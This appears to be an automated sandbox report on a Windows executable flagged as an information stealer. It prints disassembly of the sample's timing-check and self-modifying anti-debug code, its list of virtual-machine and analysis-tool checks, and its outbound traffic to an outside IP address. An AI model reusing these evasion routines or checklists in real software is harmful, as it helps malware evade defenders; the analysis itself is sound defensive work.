Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD148E second address: 6FD1494 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1494 second address: 6FD1558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F61848348A8h 0x00000008 pushfd 0x00000009 jmp 00007F61848348A2h 0x0000000e and cx, C1F8h 0x00000013 jmp 00007F618483489Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [esi+28h] 0x0000001f pushad 0x00000020 mov al, CBh 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007F618483489Ch 0x00000029 add ecx, 26669C58h 0x0000002f jmp 00007F618483489Bh 0x00000034 popfd 0x00000035 pop ecx 0x00000036 popad 0x00000037 mov dword ptr [edx+28h], eax 0x0000003a jmp 00007F618483489Fh 0x0000003f mov ecx, dword ptr [esi+2Ch] 0x00000042 pushad 0x00000043 mov si, D51Bh 0x00000047 call 00007F61848348A0h 0x0000004c call 00007F61848348A2h 0x00000051 pop esi 0x00000052 pop edx 0x00000053 popad 0x00000054 mov dword ptr [edx+2Ch], ecx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a jmp 00007F61848348A3h 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1558 second address: 6FD155D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD155D second address: 6FD1563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1563 second address: 6FD1567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1567 second address: 6FD1588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [esi+30h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1588 second address: 6FD158C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD158C second address: 6FD1590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1590 second address: 6FD1596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1596 second address: 6FD15F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F61848348A0h 0x00000008 pop eax 0x00000009 jmp 00007F618483489Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov word ptr [edx+30h], ax 0x00000015 jmp 00007F61848348A6h 0x0000001a mov ax, word ptr [esi+32h] 0x0000001e jmp 00007F61848348A0h 0x00000023 mov word ptr [edx+32h], ax 0x00000027 pushad 0x00000028 mov dx, si 0x0000002b push eax 0x0000002c push edx 0x0000002d mov bh, cl 0x0000002f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD15F2 second address: 6FD1603 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 69C8h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ecx, edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1603 second address: 6FD1712 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 776Ah 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F618483489Bh 0x0000000e adc ax, 800Eh 0x00000013 jmp 00007F61848348A9h 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [edx+34h], eax 0x0000001d jmp 00007F618483489Eh 0x00000022 test ecx, 00000700h 0x00000028 jmp 00007F61848348A0h 0x0000002d jne 00007F61F319294Fh 0x00000033 pushad 0x00000034 mov edx, esi 0x00000036 movzx ecx, dx 0x00000039 popad 0x0000003a or dword ptr [edx+38h], FFFFFFFFh 0x0000003e jmp 00007F61848348A5h 0x00000043 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000047 pushad 0x00000048 jmp 00007F618483489Ch 0x0000004d pushfd 0x0000004e jmp 00007F61848348A2h 0x00000053 sub eax, 4E965E78h 0x00000059 jmp 00007F618483489Bh 0x0000005e popfd 0x0000005f popad 0x00000060 or dword ptr [edx+40h], FFFFFFFFh 0x00000064 pushad 0x00000065 pushfd 0x00000066 jmp 00007F61848348A4h 0x0000006b xor si, 78D8h 0x00000070 jmp 00007F618483489Bh 0x00000075 popfd 0x00000076 mov ch, A3h 0x00000078 popad 0x00000079 pop esi 0x0000007a pushad 0x0000007b mov cl, bl 0x0000007d jmp 00007F618483489Ah 0x00000082 popad 0x00000083 pop ebx 0x00000084 push eax 0x00000085 push edx 0x00000086 jmp 00007F61848348A7h 0x0000008b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1712 second address: 6FD171A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 7020C41 second address: 7020C8A instructions: 0x00000000 rdtsc 0x00000002 mov cx, D3EFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F61848348A4h 0x0000000e add ax, 4218h 0x00000013 jmp 00007F618483489Bh 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [esp], ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F61848348A5h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 7020C8A second address: 7020C90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 7020C90 second address: 7020C94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 7020C94 second address: 7020CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov eax, edi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FC0125 second address: 6FC0134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F618483489Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FC0134 second address: 6FC0167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F6184CCBA84h 0x00000014 sbb ah, FFFFFFC8h 0x00000017 jmp 00007F6184CCBA7Bh 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FC0167 second address: 6FC01B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov ecx, 09A1AEC3h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F61848348A6h 0x0000001a adc ecx, 7E4EA988h 0x00000020 jmp 00007F618483489Bh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F6003A second address: 6F6005C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C0FAh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F6184CCBA7Eh 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F6005C second address: 6F60060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F60060 second address: 6F60066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F60066 second address: 6F6006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F6006C second address: 6F60070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F60070 second address: 6F60095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ecx, 73B8C55Fh 0x00000010 pushad 0x00000011 jmp 00007F61848348A2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F60C00 second address: 6F60C14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, 07DEh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FB097E second address: 6FB098E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F618483489Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FB098E second address: 6FB0992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F9000A second address: 6F90034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 68C6h 0x00000007 mov ecx, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007F61848348A6h 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F90034 second address: 6F90041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 7FB9h 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b mov dl, ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F9014C second address: 6F90152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F90152 second address: 6F90156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F90156 second address: 6F90172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F61848348A0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F90172 second address: 6F901A4 instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007F6184CCBA7Eh 0x0000000c popad 0x0000000d mov dword ptr [esp], edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6184CCBA87h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F901A4 second address: 6F901AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F901AA second address: 6F901AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F901AE second address: 6F901B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F901B2 second address: 6F901C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6184CCBA7Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F901C9 second address: 6F90221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F618483489Dh 0x00000009 jmp 00007F618483489Bh 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp+24h], 00000000h 0x0000001a pushad 0x0000001b jmp 00007F61848348A4h 0x00000020 mov ch, CFh 0x00000022 popad 0x00000023 lock bts dword ptr [edi], 00000000h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F618483489Fh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F90221 second address: 6F9023E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F9023E second address: 6F90268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F61F4766A76h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F618483489Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F90268 second address: 6F902C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, C152h 0x00000007 mov edi, 260BA09Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F6184CCBA7Bh 0x00000017 adc ax, 6D4Eh 0x0000001c jmp 00007F6184CCBA89h 0x00000021 popfd 0x00000022 mov eax, 02959D57h 0x00000027 popad 0x00000028 pop esi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F6184CCBA89h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F902C6 second address: 6F902D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F618483489Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F902D6 second address: 6F902ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F902ED second address: 6F90310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F61848348A1h 0x0000000a jmp 00007F618483489Bh 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F90310 second address: 6F90337 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, edi 0x00000010 push edi 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FC0273 second address: 6FC0283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F618483489Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FC0283 second address: 6FC02AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edx, 53B7D9BAh 0x00000012 push ebx 0x00000013 mov eax, 2E5DF19Dh 0x00000018 pop eax 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FC02AA second address: 6FC02AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FC02AE second address: 6FC02C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FB08A1 second address: 6FB08BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F61848348A7h 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSpecial instruction interceptor: First address: 103A7EF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSpecial instruction interceptor: First address: 1063EDB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSpecial instruction interceptor: First address: 1043799 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSpecial instruction interceptor: First address: 10C8D3A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00A69980 rdtsc 0_2_00A69980
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe TID: 6764Thread sleep time: -40020s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe TID: 5008Thread sleep time: -30015s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe TID: 4428Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0088255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0088255D
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008829FF
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0088255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0088255D
Source: f9bcOz8SxR.exe, f9bcOz8SxR.exe, 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: f9bcOz8SxR.exe, 00000000.00000003.2231447033.0000000001601000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2232262554.0000000001604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: f9bcOz8SxR.exeBinary or memory string: Hyper-V RAW
Source: f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: f9bcOz8SxR.exe, 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: f9bcOz8SxR.exe, 00000000.00000003.2619927934.0000000001667000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2569039069.0000000001642000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619689608.0000000001661000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619620366.0000000001658000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619184023.0000000001654000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000002.2633653374.0000000001668000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeFile opened: NTICE
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeFile opened: SICE
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00A69980 rdtsc 0_2_00A69980
Source: f9bcOz8SxR.exe, f9bcOz8SxR.exe, 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: )*Program Manager
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.5:49720 -> 147.45.113.159:80
Source: global trafficTCP traffic: 192.168.2.5:49803 -> 147.45.113.159:80

